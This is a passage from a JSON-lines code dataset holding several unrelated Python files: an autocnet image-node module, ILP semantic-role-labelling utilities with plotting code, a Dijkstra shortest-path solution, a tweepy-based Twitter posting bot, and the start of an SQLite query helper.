: str or object\n PATH to the directory for output and base file name\n \"\"\"\n if self.keypoints.empty:\n warnings.warn('Node {} has not had features extracted.'.format(self['node_id']))\n return\n\n io_keypoints.to_npy(self.keypoints, self.descriptors,\n out_path + '_{}.npz'.format(self['node_id']))\n\n def plot(self, clean_keys=[], **kwargs): # pragma: no cover\n return plot_node(self, clean_keys=clean_keys, **kwargs)\n\n def _clean(self, clean_keys):\n \"\"\"\n Given a list of clean keys compute the\n mask of valid matches\n\n Parameters\n ----------\n clean_keys : list\n of columns names (clean keys)\n\n Returns\n -------\n matches : dataframe\n A masked view of the matches dataframe\n\n mask : series\n A boolean series to inflate back to the full match set\n \"\"\"\n if self.keypoints.empty:\n raise AttributeError('Keypoints have not been extracted for this node.')\n panel = self.masks\n mask = panel[clean_keys].all(axis=1)\n matches = self.keypoints[mask]\n return matches, mask\n\n def reproject_geom(self, coords): # pragma: no cover\n \"\"\"\n Reprojects a set of latlon coordinates into pixel space using the nodes\n geodata. 
These are then returned as a shapely polygon\n\n Parameters\n ----------\n coords : ndarray\n (n, 2) array of latlon coordinates\n\n Returns\n ----------\n : object\n A shapely polygon object made using the reprojected coordinates\n \"\"\"\n reproj = []\n\n for x, y in coords:\n reproj.append(self.geodata.latlon_to_pixel(y, x))\n return shapely.geometry.Polygon(reproj)\n\nclass NetworkNode(Node):\n def __init__(self, *args, **kwargs):\n super(NetworkNode, self).__init__(*args, **kwargs)\n # If this is the first time that the image is seen, add it to the DB\n self.job_status = defaultdict(dict)\n\n def populate_db(self):\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(Images.path == self['image_path']).first()\n if res:\n # Image already exists\n return\n\n # If the geodata is not valid, do not create an associated keypoints file\n # One instance when invalid is during testing.\n if hasattr(self.geodata, 'file_name'):\n kpspath = io_keypoints.create_output_path(self.geodata.file_name)\n # Create the keypoints entry\n kps = Keypoints(path=kpspath, nkeypoints=0)\n else:\n kps = None\n\n try:\n fp, cam_type = self.footprint\n except Exception as e:\n warnings.warn('Unable to generate image footprint.\\n{}'.format(e))\n fp = cam_type = None\n # Create the image\n i = Images(name=self['image_name'],\n path=self['image_path'],\n geom=fp,\n keypoints=kps,\n #cameras=cam,\n serial=self.isis_serial,\n cam_type=cam_type)\n\n with self.parent.session_scope() as session:\n session.add(i)\n\n def _from_db(self, table_obj, key='image_id'):\n \"\"\"\n Generic database query to pull the row associated with this node\n from an arbitrary table. We assume that the row id matches the node_id.\n\n Parameters\n ----------\n table_obj : object\n The declared table class (from db.model)\n\n key : str\n The name of the column to compare this object's node_id with. For\n most tables this will be the default, 'image_id' because 'image_id'\n is the foreign key in the DB. 
For the Images table (the parent table),\n the key is simply 'id'.\n \"\"\"\n if 'node_id' not in self.keys():\n return\n with self.parent.session_scope() as session:\n res = session.query(table_obj).filter(getattr(table_obj,key) == self['node_id']).first()\n session.expunge_all()\n return res\n\n @property\n def parent(self):\n return getattr(self, '_parent', None)\n\n @parent.setter\n def parent(self, parent):\n self._parent = parent\n\n @property\n def keypoint_file(self):\n res = self._from_db(Keypoints)\n if res is None:\n return\n return res.path\n\n @property\n def keypoints(self):\n try:\n return io_keypoints.from_hdf(self.keypoint_file, descriptors=False)\n except:\n return pd.DataFrame()\n\n @keypoints.setter\n def keypoints(self, kps):\n io_keypoints.to_hdf(self.keypoint_file, keypoints=kps)\n\n res = self._from_db(Keypoints)\n with self.parent.session_scope() as session:\n res.nkeypoints = len(kps)\n\n @property\n def descriptors(self):\n try:\n return io_keypoints.from_hdf(self.keypoint_file, keypoints=False)\n except:\n return\n\n @descriptors.setter\n def descriptors(self, desc):\n if isinstance(desc, np.ndarray):\n io_keypoints.to_hdf(self.keypoint_file, descriptors=desc)\n\n @property\n def nkeypoints(self):\n \"\"\"\n Get the number of keypoints from the database\n \"\"\"\n res = self._from_db(Keypoints)\n return res.nkeypoints if res is not None else 0\n\n def create_camera(self, url):\n \"\"\"\n Creates a CSM sensor for the node and serializes the state\n to the DB.\n\n Parameters\n ----------\n url : str\n The URI to a service that can create an ISD to instantiate\n a sensor.\n \"\"\"\n raise NotImplementedError\n\n # TODO: This should pass the straight metadata and not mess with munging it.\n label = pvl.dumps(self.geodata.metadata).decode()\n response = requests.post(url, json={'label':label})\n response = response.json()\n model_name = response.get('name_model', None)\n if model_name is None:\n return\n isdpath = os.path.splitext(self['image_path'])[0] + '.json'\n try:\n with open(isdpath, 'w') as f:\n json.dump(response, f)\n except Exception as e:\n warnings.warn('Failed to write JSON ISD for image {}.\\n{}'.format(self['image_path'], e))\n isd = csmapi.Isd(self['image_path'])\n plugin = csmapi.Plugin.findPlugin('UsgsAstroPluginCSM')\n self._camera = plugin.constructModelFromISD(isd, model_name)\n serialized_camera = self._camera.getModelState()\n\n cam = Cameras(camera=serialized_camera, image_id=self['node_id'])\n return cam\n\n @property\n def camera(self):\n \"\"\"\n Get the camera object from the database.\n \"\"\"\n # TODO: This should use knoten once it is stable.\n import csmapi\n if not getattr(self, '_camera', None):\n res = self._from_db(Cameras)\n plugin = csmapi.Plugin.findPlugin('UsgsAstroPluginCSM')\n if res is not None:\n self._camera = plugin.constructModelFromState(res.camera)\n return self._camera\n\n @property\n def footprint(self):\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(Images.id == self['node_id']).first()\n\n # not in database, create footprint\n if res is None:\n # get ISIS footprint if possible\n if utils.find_in_dict(self.geodata.metadata, \"Polygon\"):\n footprint_latlon = shapely.wkt.loads(self.geodata.footprint.ExportToWkt())\n if isinstance(footprint_latlon, shapely.geometry.Polygon):\n footprint_latlon = shapely.geometry.MultiPolygon([footprint_latlon])\n cam_type = 'isis'\n return footprint_latlon, cam_type\n # Get CSM footprint\n else:\n boundary = 
generate_boundary(self.geodata.raster_size[::-1]) # yx to xy\n footprint_latlon = generate_latlon_footprint(self.camera,\n boundary,\n dem=self.parent.dem)\n footprint_latlon.FlattenTo2D()\n cam_type = 'csm'\n return footprint_latlon, cam_type\n else:\n # in database, return footprint\n footprint_latlon = res.footprint_latlon\n return footprint_latlon\n\n @property\n def points(self):\n with self.parent.session_scope() as session:\n pids = session.query(Measures.pointid).filter(Measures.imageid == self['node_id']).all()\n res = session.query(Points).filter(Points.id.in_(pids)).all()\n return res\n\n @property\n def measures(self):\n with self.parent.session_scope() as session:\n res = session.query(Measures).filter(Measures.imageid == self['node_id']).all()\n return res\n\n @property\n def ignore(self):\n \"\"\"\n Gets the ignore flag from the Images table\n \"\"\"\n res = self._from_db(Images, key='id')\n return res.ignore\n\n @ignore.setter\n def ignore(self, ignore):\n \"\"\"\n Sets the ignore flag in the Images table\n \"\"\"\n with self.parent.session_scope() as session:\n res = session.query(Images).filter(getattr(Images,'id') == self['node_id']).one()\n res.ignore = ignore\n\n","sub_path":"autocnet/graph/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":23452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"263050776","text":"import os\nimport json\nimport numpy as np\nimport operator\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport subprocess\nimport warnings\n\n\nfrom collections import defaultdict\nfrom os.path import join\nimport entailment\nimport ilp_config\n\n__author__ = 'chetannaik'\n\n# Force matplotlib to not use any Xwindows backend (to run without error on ambiguity)\nmatplotlib.use('Agg')\nilp_config.set_plot_config()\n\n\ndef load_srl_data(srl_file):\n \"\"\"Read the srl json, parse it into a python dictionary and return.\"\"\"\n d = json.load(open(srl_file, \"r\"))\n data = {}\n for p_data in d:\n process = p_data['process']\n ss_data = p_data['sentences']\n sent_to_id = {}\n id_to_args = {}\n sentences = {}\n arg_role_scores = {}\n arg_role_srl_data = {}\n for s_data in ss_data:\n sentence = s_data['text']\n s_id = s_data['sentenceId']\n sent_to_id[sentence] = s_id\n sentences[s_id] = sentence\n a_spans = s_data['predictionArgumentSpan']\n args = []\n if len(a_spans) != 0:\n for a_span in a_spans:\n srl_role_prediction = a_span['rolePredicted']\n start_idx = a_span['startIdx']\n end_idx = a_span['endIdx']\n arg_text = a_span['text']\n arg_id = a_span['argId']\n role_prob_list = a_span['probRoles']\n args.append((arg_id, arg_text))\n role_probs = {}\n for role_prob in role_prob_list:\n role_probs.update(role_prob)\n arg_role_scores[(s_id, arg_id)] = role_probs\n arg_role_srl_data[(s_id, arg_id)] = [srl_role_prediction, start_idx, end_idx]\n id_to_args[s_id] = args\n if len(arg_role_scores.keys()) != 0:\n data[process] = [sent_to_id, id_to_args, arg_role_scores, arg_role_srl_data, sentences]\n return data\n\n\ndef dump_ilp_json(data, ilp_data, ilp_scores, ilp_out_path):\n \"\"\"Dump json file using the dictionary created from ilp data\"\"\"\n j_dump_data = []\n for process in data.keys():\n # list of sentences\n sent_list = []\n sent_to_id, id_to_args, arg_role_scores, arg_role_srl_data = data[process][:4]\n ilp_score = ilp_scores[process]\n for sentence_text, s_id in sent_to_id.iteritems():\n # list of args\n arg_list = []\n for arg_id, arg_text in id_to_args[s_id]:\n srl_role_prediction, 
srl_role_prediction, start_idx, end_idx = arg_role_srl_data[(s_id, arg_id)]\n # list of probs\n role_probs = map(lambda x: dict([x]), ilp_score[(s_id, arg_id)].items())\n ilp_r_vals = ilp_data[process][s_id][arg_id]\n ilp_i_vals = {v: k for k, v in ilp_r_vals.items()}\n if 1 in ilp_i_vals:\n ilp_role = ilp_config.roles[ilp_i_vals[1]]\n else:\n ilp_role = \"NONE\"\n arg_list.append({'argId': arg_id,\n 'text': arg_text,\n 'rolePredicted': ilp_role,\n 'startIdx': start_idx,\n 'endIdx': end_idx,\n 'probRoles': role_probs})\n sent_list.append({'sentenceId': s_id,\n 'text': sentence_text,\n 'predictionArgumentSpan': arg_list})\n j_dump_data.append({'process': process,\n 'sentences': sent_list})\n with open(ilp_out_path, 'w') as fp:\n json.dump(j_dump_data, fp, indent=4)\n\n\n# Some useful utilities\ndef get_sentences(p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n return [(v, k) for k, v in sent_to_id.iteritems()]\n\n\ndef get_sentence_args(sentence, p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n s_id = sent_to_id[sentence]\n return id_to_args[s_id]\n\n\ndef get_role_scores(sentence, arg_id, role, p_data):\n sent_to_id, id_to_args, arg_role_scores = p_data\n s_id = sent_to_id[sentence]\n return arg_role_scores[s_id, arg_id][role]\n\n\ndef get_role_score_dict(p_data):\n sentences = get_sentences(p_data)\n roles = ilp_config.roles\n role_score_vars = {}\n for s_id, sentence in sentences:\n args = get_sentence_args(sentence, p_data)\n for a_id, arg in args:\n for r_id, role in enumerate(roles):\n role_score = get_role_scores(sentence, a_id, role, p_data)\n role_score_vars[s_id, a_id, r_id] = role_score\n return role_score_vars\n\n\ndef get_similarity_score(arg1, arg2):\n \"\"\"Call the entailment function by passing args in both directions and\n return the best score.\"\"\"\n ret = entailment.get_ai2_textual_entailment(arg1, arg2)\n a_scores = map(lambda x: x['score'], ret['alignments'])\n if len(a_scores):\n mean_a_score = np.mean(a_scores)\n else:\n mean_a_score = 0\n\n confidence = ret['confidence'] if ret['confidence'] else 0\n score1 = mean_a_score * confidence\n\n ret = entailment.get_ai2_textual_entailment(arg2, arg1)\n a_scores = map(lambda x: x['score'], ret['alignments'])\n if len(a_scores):\n mean_a_score = np.mean(a_scores)\n else:\n mean_a_score = 0\n\n confidence = ret['confidence'] if ret['confidence'] else 0\n score2 = mean_a_score * confidence\n return float(max(score1, score2))\n\n\ndef get_ilp_assignment_from_file(process):\n f = open(join(ilp_config.project_dir, 'output', process + '_ilp.sol'))\n lines = f.readlines()\n f.close()\n data = filter(lambda x: x.startswith('Z'), lines)\n data = map(lambda x: x[:-1], data)\n\n output_map = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n for d in data:\n var, ind = d.split(\" \")\n var_ids = var.split(\"_\")\n s = int(var_ids[1])\n a = int(var_ids[2])\n r = int(var_ids[3])\n output_map[s][a][r] = int(ind)\n return output_map\n\n\ndef get_ilp_scores(process, srl_data, sim_data):\n \"\"\"Use the ILP assignments, insert them back into the objective function\n and calculate the ILP score for a given assignment.\"\"\"\n _, id_to_args, _, _, _ = srl_data[process]\n\n output_map = get_ilp_assignment_from_file(process)\n role_score_vals = get_role_score_dict(srl_data[process][:3])\n\n ilp_scores = defaultdict(lambda: defaultdict(float))\n\n for s_1, val_1 in output_map.iteritems():\n args_1 = id_to_args[s_1]\n for a_1, aval_1 in val_1.iteritems():\n arg_1 = dict(args_1)[a_1]\n for r, rv_1 in aval_1.iteritems():\n tmp = 0\n 
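# total score = lambda_1 * (SRL confidence for role r) + lambda_2 * (agreement\n # with same-role arguments in other sentences, weighted by pairwise argument\n # similarity, presumably precomputed with get_similarity_score)\n 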
for s_2, val_2 in output_map.iteritems():\n if s_1 != s_2:\n args_2 = id_to_args[s_2]\n for a_2, aval_2 in val_2.iteritems():\n arg_2 = dict(args_2)[a_2]\n rv_2 = aval_2[r]\n tmp += rv_2 * sim_data[(arg_1, arg_2)]\n ilp_scores[s_1, a_1][ilp_config.roles[r]] = (float(role_score_vals[s_1, a_1, r]) * ilp_config.lambda_1) + (ilp_config.lambda_2 * tmp)\n return ilp_scores\n\n\ndef normalize_ilp_scores(ilp_scores):\n \"\"\"Normalize the ilp scores.\"\"\"\n norm_ilp_scores = {}\n for s_a_id, a_data in ilp_scores.iteritems():\n denom = sum(a_data.values())\n norm_vals = dict(map(lambda x: (x[0], x[1]/denom), a_data.items()))\n norm_ilp_scores[s_a_id] = norm_vals\n return norm_ilp_scores\n\n\ndef get_gold_data(d_gold):\n \"\"\"Parse the gold data into a python dictionary.\"\"\"\n gold_data_raw = defaultdict(list)\n for process_dict in d_gold:\n process = process_dict['process']\n # list of sentences\n for sentence_dict in process_dict['sentences']:\n sent_id = sentence_dict['sentenceId']\n # list of arguments\n for arg_dict in sentence_dict['annotatedArgumentSpan']:\n start_id = int(arg_dict['startIdx'])\n end_id = int(arg_dict['endIdx'])\n role_type = arg_dict['annotatedRole']\n role_label = int(arg_dict['annotatedLabel'])\n argument = arg_dict['text']\n gold_data_raw[(sent_id, argument, start_id, end_id, process)].append((role_type, role_label))\n #print \"PROCESS DICT\",process_dict\n #print \"SENTENCE DICT\",sentence_dict\n #print \"RAW\",gold_data_raw\n\n gold_data = {}\n for k, v in gold_data_raw.iteritems():\n roles = []\n labels = []\n argument = []\n for x in v:\n roles.append(x[0])\n labels.append(x[1])\n #argument.append(x[2])\n # if any role name has 1 as its value, set that (the first one) as the\n # gold role.\n if 1 in labels:\n gold_data[k] = roles[labels.index(1)]\n # if none of the roles have the value 1 (but instead have -1), then set\n # the role of such an argument span to 'NONE'\n elif np.sum(labels) == -4:\n gold_data[k] = 'NONE'\n return gold_data\n\n\ndef get_prediction_data(d_predict):\n \"\"\"Parse the prediction data into a python dictionary.\"\"\"\n srl_data = defaultdict()\n for process_dict in d_predict:\n process = process_dict['process']\n # list of sentences\n for sentence_dict in process_dict['sentences']:\n sent_id = sentence_dict['sentenceId']\n # list of arguments\n for arg_dict in sentence_dict['predictionArgumentSpan']:\n start_id = int(arg_dict['startIdx'])\n end_id = int(arg_dict['endIdx'])\n role_predicted = arg_dict['rolePredicted']\n # create a dictionary with role label as key and prediction score\n # of the role as value\n role_probs = {}\n for role_prob in arg_dict['probRoles']:\n role_probs.update(role_prob)\n srl_data[(sent_id, start_id, end_id)] = (role_predicted, role_probs[role_predicted])\n return srl_data\n\n\ndef plot_precision_yield(plot_data, name='prec_recall', role=None):\n srl_plot_df, ilp_plot_df, semafor_plot_df, easysrl_plot_df = plot_data\n srl_plot_df = srl_plot_df.iloc[10:]\n ilp_plot_df = ilp_plot_df.iloc[10:]\n semafor_plot_df = semafor_plot_df.iloc[10:]\n easysrl_plot_df = easysrl_plot_df.iloc[10:]\n\n # plot size\n plt.rc('figure', figsize=(18,12))\n\n # plot lines\n plt.plot(srl_plot_df.index, srl_plot_df.precision, label=r'\\textbf{SRL}', linewidth=3)\n plt.plot(ilp_plot_df.index, ilp_plot_df.precision, 'r--', label=r'\\textbf{ILP}', linewidth=3)\n plt.plot(semafor_plot_df.index, semafor_plot_df.precision, 'g--', label=r'\\textbf{SEMAFOR}', linewidth=3)\n plt.plot(easysrl_plot_df.index, easysrl_plot_df.precision, 'm--', label=r'\\textbf{EasySRL}', linewidth=3)\n\n 
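# NOTE: the r'\\textbf{...}' labels assume matplotlib's LaTeX text rendering\n # (text.usetex) is enabled, presumably inside ilp_config.set_plot_config();\n # without it the \\textbf markup is drawn verbatim.\n\n 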
# configure plot\n plt.tick_params(axis='both', which='major', labelsize=50)\n plt.xlabel(r'\\textbf{Recall}', fontsize=50)\n plt.ylabel(r'\\textbf{Precision}', fontsize=50)\n plt.xlim([0, 1])\n plt.ylim([0, 1.005])\n plt.legend(loc='lower right', handlelength=3, prop={'size':45}) #borderpad=1.5, labelspacing=1.5,\n plt.tight_layout()\n\n # save plot\n if role:\n f_name = join(ilp_config.plots_dir, str(role) + \"_\" + str(name) + \".pdf\")\n else:\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n plt.savefig(f_name)\n plt.close()\n\n\ndef plot_precision_yield_axes(plot_data, ax, fold, role=None):\n srl_plot_df, ilp_plot_df, semafor_plot_df, easysrl_plot_df = plot_data\n srl_plot_df = srl_plot_df.iloc[5:]\n ilp_plot_df = ilp_plot_df.iloc[5:]\n semafor_plot_df = semafor_plot_df.iloc[5:]\n easysrl_plot_df = easysrl_plot_df.iloc[5:]\n\n # plot size\n plt.rc('figure', figsize=(18,14))\n\n # plot lines\n ax.plot(srl_plot_df.index, srl_plot_df.precision, label=r'\\textbf{SRL}', linewidth=3)\n ax.plot(ilp_plot_df.index, ilp_plot_df.precision, 'r--', label=r'\\textbf{ILP}', linewidth=3)\n ax.plot(semafor_plot_df.index, semafor_plot_df.precision, 'g--', label=r'\\textbf{SEMAFOR}', linewidth=3)\n ax.plot(easysrl_plot_df.index, easysrl_plot_df.precision, 'm--', label=r'\\textbf{EasySRL}', linewidth=3)\n\n # configure plot\n ax.tick_params(axis='both', which='major', labelsize=24)\n ax.set_xlabel(r'\\textbf{Recall}', fontsize=28)\n ax.set_ylabel(r'\\textbf{Precision}', fontsize=28)\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 1.005])\n if role:\n ax.set_title(str(role).title() + ' Fold ' + str(fold), fontsize=20)\n else:\n ax.set_title('Fold ' + str(fold), fontsize=20)\n ax.legend(loc='lower right', handlelength=3, prop={'size':15}) #borderpad=1.5, labelspacing=1.5,\n plt.tight_layout()\n\n\ndef plot_role_plot(data, name='prec_recall_folds', role=None):\n srl_plot_data, ilp_plot_data, semafor_plot_data, easysrl_plot_data = data\n\n # create 5 subplots, one per fold, in one column\n fig, ((ax1), (ax2), (ax3), (ax4), (ax5)) = plt.subplots(nrows=5, ncols=1, figsize=(10, 40))\n\n # call plot function on each of the 5 subplot axes\n plot_precision_yield_axes((srl_plot_data[1], ilp_plot_data[1], semafor_plot_data[1], easysrl_plot_data[1]), ax1, \"1\", role)\n plot_precision_yield_axes((srl_plot_data[2], ilp_plot_data[2], semafor_plot_data[2], easysrl_plot_data[2]), ax2, \"2\", role)\n plot_precision_yield_axes((srl_plot_data[3], ilp_plot_data[3], semafor_plot_data[3], easysrl_plot_data[3]), ax3, \"3\", role)\n plot_precision_yield_axes((srl_plot_data[4], ilp_plot_data[4], semafor_plot_data[4], easysrl_plot_data[4]), ax4, \"4\", role)\n plot_precision_yield_axes((srl_plot_data[5], ilp_plot_data[5], semafor_plot_data[5], easysrl_plot_data[5]), ax5, \"5\", role)\n\n # adjust spacing between plots\n fig.subplots_adjust(hspace=.3, wspace=-0.2)\n\n # save plot\n if role:\n f_name = join(ilp_config.plots_dir, str(role) + \"_\" + str(name) + \".pdf\")\n else:\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n fig.savefig(f_name)\n plt.close(fig)\n\n\ndef plot_confusion_matrix(c_matrix, fold=None, filename=None):\n fig, ax = plt.subplots(figsize=(12, 9))\n sns.heatmap(c_matrix, annot=True, fmt='',\n xticklabels=ilp_config.labels, yticklabels=ilp_config.labels,\n linewidths=1, square=True);\n ax.xaxis.set_ticks_position(\"bottom\")\n plt.xlabel('Predicted Label')\n plt.ylabel('True Label')\n plt.xticks(rotation=30)\n plt.yticks(rotation=30)\n if fold:\n plt.title('Fold ' + str(fold) + ' Confusion Matrix', 
fontsize=20);\n else:\n plt.title('Confusion Matrix', fontsize=20);\n if filename:\n f_name = join(ilp_config.plots_dir, str(filename) + \".pdf\")\n plt.savefig(f_name)\n plt.close()\n\n\ndef subplot_confusion_matrix(c_matrix, ax, fold):\n sns.heatmap(c_matrix, annot=True, fmt='',\n xticklabels=ilp_config.labels, yticklabels=ilp_config.labels,\n linewidths=1, square=True, ax=ax, cbar=False);\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.set_xticklabels(ilp_config.labels, rotation=30, fontsize=20)\n ax.set_yticklabels(ilp_config.labels[::-1], rotation=30, fontsize=20)\n ax.set_xlabel('Predicted Label', fontsize=20)\n ax.set_ylabel('True Label', fontsize=20)\n ax.set_title(\"Fold \" + str(fold) + ' Confusion Matrix', fontsize=20);\n\n\ndef plot_confusion_subplots(c_matrices, name=\"confusion_matrix\"):\n fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(nrows=3, ncols=2, figsize=(20, 20))\n subplot_confusion_matrix(c_matrices[1], ax1, \"1\")\n subplot_confusion_matrix(c_matrices[2], ax2, \"2\")\n subplot_confusion_matrix(c_matrices[3], ax3, \"3\")\n subplot_confusion_matrix(c_matrices[4], ax4, \"4\")\n #subplot_confusion_matrix(c_matrices[5], ax5, \"5\")\n fig.subplots_adjust(hspace=.8, wspace=-0.2)\n ax6.axis('off')\n f_name = join(ilp_config.plots_dir, str(name) + \".pdf\")\n fig.savefig(f_name)\n plt.close(fig)\n\n\ndef generate_tex_table(df, name='accuracy_table'):\n filename = join(ilp_config.plots_dir, str(name) + \".tex\")\n pdffile = join(ilp_config.plots_dir, str(name) + \".pdf\")\n outname = join(ilp_config.plots_dir, str(name) + \".png\")\n\n template = r'''\\documentclass[preview]{{standalone}}\n \\usepackage{{booktabs}}\n \\begin{{document}}\n {}\n \\end{{document}}\n '''\n\n with open(filename, 'wb') as f:\n f.write(template.format(df.to_latex()))\n\n FNULL = open(os.devnull, 'w')\n subprocess.call(['pdflatex', '-output-directory', ilp_config.plots_dir, filename], stdout=FNULL, stderr=subprocess.STDOUT)\n subprocess.call(['convert', '-density', '300', pdffile, '-quality', '90', outname], stdout=FNULL, stderr=subprocess.STDOUT)\n","sub_path":"ilp_utils.py","file_name":"ilp_utils.py","file_ext":"py","file_size_in_byte":16716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196166021","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nINF = sys.maxsize\n\nN, M = map(int, input().split())\ndistance = [INF for _ in range(N + 1)]\nvisited = [False for _ in range(N + 1)]\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n node1, node2, dist = map(int, input().split())\n graph[node1].append((dist, node2))\n graph[node2].append((dist, node1))\n\nqueue = []\nheapq.heappush(queue, (0, 1))\ndistance[1] = 0\nvisited[1] = True\nwhile queue:\n dist, now = heapq.heappop(queue)\n if distance[now] < dist:\n continue\n for path in graph[now]:\n if not visited[path[1]] and path[0] + dist < distance[path[1]]:\n distance[path[1]] = path[0] + dist\n heapq.heappush(queue, (distance[path[1]], path[1]))\n visited[now] = True\nprint(distance[-1])\n\n\"\"\"\nSolution\nI just solved it using Dijkstra's algorithm.\n\nIt had been a while since I last solved a Dijkstra problem, so I couldn't\nremember it and went back over the theory. Even so, I kept mixing up\nindividual numbers and got it wrong a few times.\n
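\nA quick illustrative check: for the input\n3 3\n1 2 3\n2 3 4\n1 3 10\nthe cheapest route from node 1 to node N costs 7 (1 -> 2 -> 3), which is\nwhat this code prints.\n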
\"\"\"","sub_path":"season3/season3/week1/minkyu/5972.py","file_name":"5972.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248206330","text":"#Jonathan Ingram\r\n#12/20/2019\r\n#define different types of posts\r\n\r\n\r\n\r\n'''\r\nPLEASE READ:\r\n\r\nThe primary purpose of this file is to define and categorize\r\ndifferent types of Twitter posts.\r\nNothing will be run directly in this file.\r\n\r\n'''\r\n#External Libraries\r\nimport random\r\nimport time\r\nfrom time import strftime\r\nimport tweepy\r\nimport textblob\r\n\r\nimport openFiles\r\n\r\n#Reading in keys\r\napiKey = openFiles.OpenFiles.openApiKey()\r\napiSecretKey = openFiles.OpenFiles.openApiSecretKey()\r\n\r\naccessToken = openFiles.OpenFiles.openAccessToken()\r\naccessTokenSecret = openFiles.OpenFiles.openAccessTokenSecret()\r\n\r\nauth = tweepy.OAuthHandler(apiKey, apiSecretKey)\r\nauth.set_access_token(accessToken, accessTokenSecret)\r\n\r\napi = tweepy.API(auth)\r\n\r\n\r\n#Posts class\r\nclass Posts:\r\n def __init__(self):\r\n print(\"Instance of posts class within PostTypes.py\")\r\n\r\n def tweetImage():\r\n media = api.media_upload(\"Images/mountain.jfif\")\r\n\r\n post_result = api.update_status(status=\"Chill:\\n\\n\\n\", media_ids=[media.media_id])\r\n\r\n def onePost():\r\n api.update_status(status=\"test\")\r\n\r\n def hourlyPost():\r\n\r\n \r\n def getTime(): #Gets the time and returns it as a string\r\n string = strftime('%H:%M:%S')\r\n print(string)\r\n return string\r\n\r\n hour = 0\r\n checkHour = \":33:30\"\r\n timeString = \"\"\r\n\r\n \r\n while (timeString != \"23:30:30\"): #loop until it's 11:30:30 pm\r\n timeString = str(getTime())\r\n print(timeString)\r\n time.sleep(1)\r\n\r\n\r\n #slice out the \":MM:SS\" part so it can be compared to checkHour\r\n postTime = timeString[2:8]\r\n\r\n if(postTime == checkHour):\r\n Posts.onePost()\r\n\r\n\r\n'''\r\n#Functions that are TBD to be put into production\r\n def nounVerbNoun():\r\n \r\n\r\n nvn = openFiles.OpenFiles.getNoun() + openFiles.OpenFiles.getVerb() + openFiles.OpenFiles.getNoun()\r\n print(nvn)\r\n #api.update_status(status=nvn)\r\n\r\n def pastTenseNounVerbNoun():\r\n\r\n nPTVn = \"The\\n\" + openFiles.OpenFiles.getNoun() + openFiles.OpenFiles.getPastTenseVerb().lower() + \"the\\n\" + openFiles.OpenFiles.getNoun()\r\n\r\n print(nPTVn)\r\n\r\n def nameVerbNoun():\r\n\r\n nPTVn = openFiles.OpenFiles.getName() + openFiles.OpenFiles.getPastTenseVerb().lower() + \"the\\n\" + openFiles.OpenFiles.getNoun()\r\n\r\n print(nPTVn)\r\n\r\n def newMeme():\r\n\r\n\r\n memeCheck = True\r\n while (memeCheck == True):\r\n\r\n nMeme = openFiles.OpenFiles.getMeme()\r\n print(nMeme)\r\n\r\n memeCheck = True\r\n answer = input(\"Do you like this meme? \")\r\n\r\n if (answer == \"y\"):\r\n print(\"posted\")\r\n api.update_status(status=nMeme)\r\n memeCheck = False\r\n\r\n else:\r\n print(\"not posted\")\r\n'''\r\n\r\n#End of Posts class","sub_path":"Event_Board/PostTypes.py","file_name":"PostTypes.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"436124314","text":"import sqlite3\nimport sys\nfrom pprint import pprint\n\n# State class\nclass SQLiteController():\n\n DB_LOCATION = '../db/lsl.db'\n\n # DB File\n @property\n def con(self):\n return self.__con\n @con.setter\n def con(self, value):\n self.__con = value\n\n # Cursor object\n @property\n def cursor(self):\n return self.__cursor\n @cursor.setter\n def cursor(self, value):\n self.__cursor = value\n\n dbtype = \"\"\n\n def __init__(self):\n self.dbtype = \"SQLite\"\n co, cr = self.GetConnectCursor()\n\n def GetConnectCursor(self):\n con = self.CheckCreateDB()\n cur = con.cursor()\n return con, cur\n\n # Get the target DB file. If it does not exist, create it first.\n def CheckCreateDB(self):\n relativePath = SQLiteController.DB_LOCATION\n\n # print(\"relativePath\", relativePath)\n\n con = sqlite3.connect(relativePath)\n return con\n\n def Json2Query(self, jsonquery):\n return\n\n def Create(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n\n def Read(self, q, opt=[]):\n print(self.dbtype, sys._getframe().f_code.co_name, q)\n # {'collection': 'sticker_detail', 'projection': ['local_id'], 'selection': {'parent_id': 1162635},\n # 'sort': {'enable': 1, 'order': {'key': 'local_id', 'direction': 1}}}\n # 'SELECT local_id FROM sticker_detail WHERE parent_id=%s ORDER BY local_id' % (parentID)\n\n q_select = \"SELECT\"\n q_from = \"FROM\"\n q_where = \"WHERE\"\n\n q_select += \" \" + q[\"projection\"][0]\n q_from += \" \" + q[\"collection\"]\n\n for dicKey in q[\"selection\"].keys():\n keyVal = q[\"selection\"][dicKey]\n where_cond = \"(%s = %s)\" % (dicKey, keyVal)\n\n q_where += \" \" + where_cond\n\n q_order = \"\"\n if (q[\"sort\"][\"enable\"]):\n q_order = \"ORDER BY\"\n sort_param = \"ASC\" if q[\"sort\"][\"order\"][\"direction\"] == 1 else \"DESC\"\n q_order += \" \" + q[\"sort\"][\"order\"][\"key\"] + \" \" + sort_param\n\n squery = q_select + \" \" + q_from + \" \" + q_where + \" \" + q_order\n\n print(\"squery =\", squery)\n\n co, cr = self.GetConnectCursor()\n\n cr.execute(squery)\n\n # placeholder query type; 'count' would switch to a single-value fetch\n qtype = \"ABC\"\n if qtype == 'count':\n dbResult = cr.fetchone()\n dbResult = int(dbResult[0])\n else:\n dbResult = cr.fetchall()\n co.close()\n\n for find in dbResult:\n 